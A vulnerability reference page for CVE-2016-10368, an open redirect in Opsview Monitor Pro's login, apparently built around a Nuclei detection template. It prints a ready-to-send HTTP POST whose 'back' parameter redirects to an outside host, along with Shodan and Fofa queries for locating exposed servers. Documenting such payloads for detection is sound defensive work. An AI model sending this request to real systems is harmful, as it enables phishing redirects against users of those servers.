🔙 목록으로 돌아가기

CVE-2016-10368: Opsview Monitor Pro - Open Redirect

TitleOpsview Monitor Pro - Open Redirect
Author0x_Akoko
SeverityMedium
ImpactAn attacker can redirect users to malicious websites, leading to phishing attacks or the download of malware.
RemediationApply the latest patch or upgrade to a version that is not affected by the vulnerability.
CVSS Score6.1
EPSS Score0.01027
CVE IDCVE-2016-10368
CWE IDCWE-601
Shodan Queryhttp.title:"opsview"
Fofa Querytitle="opsview"
Tags cve2016 cve redirect opsview authenticated vuln

🔍 Vulnerability Description

Opsview Monitor Pro before 5.1.0.162300841, before 5.0.2.27475, before 4.6.4.162391051, and 4.5.x without a certain 2016 security patch contains an open redirect vulnerability. An attacker can redirect users to arbitrary web sites and conduct phishing attacks via the back parameter to the login URI.

🌐 HTTP Request

POST /login HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Safari/605.1.15
Connection: close
Content-Length: 85
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

login_username=cXtZQX&login_password=nJK7dV&login=&back=//www.interact.sh&app=OPSVIEW

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2016/CVE-2016-10368.yaml

🦈 Packet Capture: ⬇️ Download cve-2016-10368.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A